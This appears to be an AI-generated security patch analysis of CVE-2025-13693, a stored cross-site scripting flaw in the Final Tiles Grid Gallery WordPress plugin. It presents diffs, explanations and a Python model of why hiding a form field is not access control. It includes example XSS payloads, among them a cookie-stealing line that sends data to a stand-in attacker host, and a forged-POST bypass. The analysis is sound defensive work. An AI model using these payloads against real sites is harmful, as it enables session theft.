Analysis Report Folder Analysis cache/final-tiles-grid-gallery-lite_3.6.8 → cache/final-tiles-grid-gallery-lite_3.6.9 - CVE-2025-13693

Shared security patch analysis results

AI Used: claude_cli haiku
CVE Security Analysis & Writeups

Comprehensive security analysis generated by AI for each confirmed CVE match, covering vulnerability background, technical details and patch analysis.

CVE-2025-13693
AI-Generated Analysis
FinalTilesGalleryLite.php (AI: 1 vulnerability, 1 true positive) CVE-2025-13693
--- cache/final-tiles-grid-gallery-lite_3.6.8/FinalTilesGalleryLite.php	2025-12-21 09:35:59.449067309 +0000+++ cache/final-tiles-grid-gallery-lite_3.6.9/FinalTilesGalleryLite.php	2025-12-21 09:36:06.017475588 +0000@@ -3,7 +3,7 @@ /**
  * Plugin Name:              Final Tiles Grid Gallery - Image Gallery
  * Description:              WordPress Plugin for creating responsive image galleries.
- * Version:                  3.6.8
+ * Version:                  3.6.9
  * Author:                   WPChill
  * Author URI:               https://wpchill.com
  * Tested up to:             6.9
@@ -25,7 +25,7 @@  * Original Author:          https://profiles.wordpress.org/greentreealbs/
  *
  */
-define( 'FTGVERSION', '3.6.8' );
+define( 'FTGVERSION', '3.6.9' );
 // Create a helper function for easy SDK access.
 if ( !function_exists( 'ftg_fs' ) ) {
     // Create a helper function for easy SDK access.
@@ -1134,7 +1134,7 @@                 if ( current_user_can( 'unfiltered_html' ) ) {
                     $script = ( isset( $_POST['ftg_script'] ) ? wp_kses_post( wp_unslash( $_POST['ftg_script'] ) ) : '' );
                 } else {
-                    $script = ( isset( $_POST['ftg_script'] ) ? wp_strip_all_tags( wp_unslash( $_POST['ftg_script'] ) ) : '' );
+                    $script = '';
                 }
                 $captionEffectDuration = ( isset( $_POST['ftg_captionEffectDuration'] ) ? absint( $_POST['ftg_captionEffectDuration'] ) : 250 );
                 $id = ( isset( $_POST['ftg_gallery_edit'] ) ? absint( $_POST['ftg_gallery_edit'] ) : 0 );
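Review bot: the else branch now assigns `$script = '';` unconditionally, so every save by a user without `unfiltered_html` overwrites whatever custom script an administrator had previously stored for the same gallery (`$id` from `ftg_gallery_edit`); if such users are meant to edit other gallery settings, keep the existing stored value rather than blanking it. The hunk also shows only the input side: the place where `$script` is echoed is not in this diff, so the patch cannot be judged complete from this file alone. The untouched privileged branch is fine, but its `wp_kses_post()` call should not be read as JavaScript sanitization; it is an HTML allowlist, and the capability check is the actual control.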
AI Analysis
Vulnerability Existed: yes
TRUE POSITIVE
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79 - FinalTilesGalleryLite.php lines 1134-1138 (handling of `$_POST['ftg_script']`)

Old Code:
```php
if ( current_user_can( 'unfiltered_html' ) ) {
    $script = ( isset( $_POST['ftg_script'] ) ? wp_kses_post( wp_unslash( $_POST['ftg_script'] ) ) : '' );
} else {
    $script = ( isset( $_POST['ftg_script'] ) ? wp_strip_all_tags( wp_unslash( $_POST['ftg_script'] ) ) : '' );
}
```

Fixed Code:
```php
if ( current_user_can( 'unfiltered_html' ) ) {
    $script = ( isset( $_POST['ftg_script'] ) ? wp_kses_post( wp_unslash( $_POST['ftg_script'] ) ) : '' );
} else {
    $script = '';
}
```

Explanation:
The old code tried to make `$_POST['ftg_script']` safe for users without `unfiltered_html` by passing it through `wp_strip_all_tags()`. That function removes HTML elements and only helps when the value is rendered as HTML. The field's own help text ("Write just the code without using the &lt;script&gt;&lt;/script&gt; tags") shows that the value is emitted in code position inside a script element, so a payload such as `alert(document.cookie)` contains no tags, passes through unchanged, and runs in the browser of anyone who views the gallery. No escaping function can make untrusted text safe in that position, which is why the fix stops storing the value at all for unprivileged users (`$script = ''`). The `unfiltered_html` branch is unchanged: `wp_kses_post()` is an HTML allowlist filter and does not neutralize JavaScript either, but WordPress already trusts holders of that capability to publish arbitrary markup and script, so the security boundary is the capability check rather than the filter. Note that the hunk covers only the input side; the diff does not include the code that prints `$script`, and the CVE description also cites insufficient output escaping.
CVE Analysis Results:
CVE-2025-13693: Yes
CVE Description:
The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Custom scripts' setting in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
admin/include/fields.php (AI: 1 vulnerability, 1 true positive) CVE-2025-13693
--- cache/final-tiles-grid-gallery-lite_3.6.8/admin/include/fields.php	2025-12-21 09:35:59.433066315 +0000+++ cache/final-tiles-grid-gallery-lite_3.6.9/admin/include/fields.php	2025-12-21 09:36:06.005474842 +0000@@ -933,13 +933,15 @@     "proCall"     => false,
     "excludeFrom" => array("shortcode"),
 ) );
-$this->addField( "Customizations", "script", array(
-    "name"        => esc_html__( "Custom scripts", "final-tiles-grid-gallery-lite" ),
-    "type"        => "textarea",
-    "description" => wp_kses( __( "This script will be called after the gallery initialization. Useful for custom lightboxes.\r\n            <br />\r\n            <br />\r\n            <strong>Write just the code without using the &lt;script&gt;&lt;/script&gt; tags</strong>", "final-tiles-grid-gallery-lite" ), array() ),
-    "proCall"     => false,
-    "excludeFrom" => array("shortcode"),
-) );
+if ( current_user_can( 'unfiltered_html' ) ) {
+    $this->addField( "Customizations", "script", array(
+        "name"        => esc_html__( "Custom scripts", "final-tiles-grid-gallery-lite" ),
+        "type"        => "textarea",
+        "description" => wp_kses( __( "This script will be called after the gallery initialization. Useful for custom lightboxes.\r\n                <br />\r\n                <br />\r\n                <strong>Write just the code without using the &lt;script&gt;&lt;/script&gt; tags</strong>", "final-tiles-grid-gallery-lite" ), array() ),
+        "proCall"     => false,
+        "excludeFrom" => array("shortcode"),
+    ) );
+}
 $this->addField( "Customizations", "delay", array(
     "name"        => esc_html__( "Delay", "final-tiles-grid-gallery-lite" ),
     "type"        => "text",
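Review bot: wrapping `addField( "Customizations", "script", ... )` in `current_user_can( 'unfiltered_html' )` only hides the textarea; it does not stop a direct POST of `ftg_script`, so this hunk is safe only together with the server-side change in FinalTilesGalleryLite.php, and the two checks must stay in sync if either is ever touched. One practical caveat worth a changelog line: on multisite `unfiltered_html` is held by super admins only (and by nobody when `DISALLOW_UNFILTERED_HTML` is set), so ordinary site administrators lose the "Custom scripts" field entirely after this change.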
AI Analysis
Vulnerability Existed: yes
TRUE POSITIVE
Missing Authorization - CWE-862 - admin/include/fields.php lines 936-944 (registration of the "Custom scripts" field)
Old Code:
```php
$this->addField( "Customizations", "script", array(
    "name"        => esc_html__( "Custom scripts", "final-tiles-grid-gallery-lite" ),
    "type"        => "textarea",
    "description" => wp_kses( __( "This script will be called after the gallery initialization. Useful for custom lightboxes.\r\n            <br />\r\n            <br />\r\n            <strong>Write just the code without using the &lt;script&gt;&lt;/script&gt; tags</strong>", "final-tiles-grid-gallery-lite" ), array() ),
    "proCall"     => false,
    "excludeFrom" => array("shortcode"),
) );
```

Fixed Code:
```php
if ( current_user_can( 'unfiltered_html' ) ) {
    $this->addField( "Customizations", "script", array(
        "name"        => esc_html__( "Custom scripts", "final-tiles-grid-gallery-lite" ),
        "type"        => "textarea",
        "description" => wp_kses( __( "This script will be called after the gallery initialization. Useful for custom lightboxes.\r\n                <br />\r\n                <br />\r\n                <strong>Write just the code without using the &lt;script&gt;&lt;/script&gt; tags</strong>", "final-tiles-grid-gallery-lite" ), array() ),
        "proCall"     => false,
        "excludeFrom" => array("shortcode"),
    ) );
}
```

Explanation:
The original code registered the "Custom scripts" textarea for every user who could open the gallery editor, without any capability check. According to the CVE description that includes Author-level users and above, who could store JavaScript that runs after gallery initialization in the browser of every visitor, administrators included (stored XSS, and from there session theft or actions in the admin's name). The fix registers the field only for users holding `unfiltered_html`: administrators on a single-site install, super admins only on multisite, and nobody when `DISALLOW_UNFILTERED_HTML` is set. Hiding the field is a UI measure, not authorization: a user can still submit `ftg_script` in a crafted POST, so the companion change in `FinalTilesGalleryLite.php`, which discards the value server-side for users without the capability, is what actually closes the hole. Both halves are needed for a consistent fix.
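The point that a hidden form field is not an access control is easy to demonstrate. The following added example (not code from the plugin or from WPChill) models the two halves of the patch in simplified form: which fields the editor renders (admin/include/fields.php) and what the save handler stores (FinalTilesGalleryLite.php). The `state` values, the field names, the request shape and the hypothetical "ui-only" half-fix are assumptions for illustration; the capability name is WordPress's.

```python
"""UI gating is not authorization: the form and the save handler each
need the capability check.

Added example, not code from the plugin or from WPChill. `state` takes
"3.6.8" (unpatched), "ui-only" (a hypothetical fix that only hides the
field) or "3.6.9" (field hidden and value discarded server-side).
"""
import re
from typing import Dict, List, Set

UNFILTERED_HTML = "unfiltered_html"

# Constructed capability sets: an Author and an administrator on a
# single-site install (where admins hold unfiltered_html).
AUTHOR_CAPS: Set[str] = {"edit_posts", "publish_posts", "upload_files"}
ADMIN_CAPS: Set[str] = {"manage_options", UNFILTERED_HTML}

# Constructed request: an Author adds ftg_script to the POST body by hand,
# regardless of whether the editor ever showed a textarea for it.
FORGED_POST: Dict[str, str] = {
    "ftg_gallery_edit": "7",
    "ftg_script": "new Image().src='https://attacker.example/?c='+document.cookie",
}


def strip_tags(value: str) -> str:
    """Minimal stand-in for wp_strip_all_tags(): an HTML-context filter."""
    return re.sub(r"<[^>]*>", "", value).strip()


def editor_fields(user_caps: Set[str], state: str) -> List[str]:
    """fields.php: in 3.6.8 the 'script' textarea is registered for everyone
    who can open the editor; in both fixed states only for unfiltered_html."""
    fields = ["delay"]
    if state == "3.6.8" or UNFILTERED_HTML in user_caps:
        fields.insert(0, "script")
    return fields


def stored_script(post: Dict[str, str], user_caps: Set[str], state: str) -> str:
    """Save handler: the value that ends up stored as the gallery's custom
    script. It sees the raw POST body, so the form is irrelevant here."""
    raw = post.get("ftg_script", "")
    if UNFILTERED_HTML in user_caps:
        return raw            # WordPress already trusts this user with script
    if state == "3.6.9":
        return ""             # patched handler: untrusted users store nothing
    return strip_tags(raw)    # 3.6.8 and ui-only: HTML filter, no-op on plain JS


def forged_post_stores_script(state: str) -> bool:
    """Does the Author's forged request leave JavaScript in the stored value?"""
    return stored_script(FORGED_POST, AUTHOR_CAPS, state) != ""


if __name__ == "__main__":
    for state in ("3.6.8", "ui-only", "3.6.9"):
        print(state, "fields shown to an Author:", editor_fields(AUTHOR_CAPS, state),
              "| forged POST stores script:", forged_post_stores_script(state))
```

The "ui-only" row is the instructive one: the Author no longer sees the textarea, yet the forged request is stored exactly as in 3.6.8, because the handler still relies on a tag filter that does nothing to tag-free JavaScript. Only the "3.6.9" row, where the handler itself checks the capability, rejects it.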
CVE Analysis Results:
CVE-2025-13693: Yes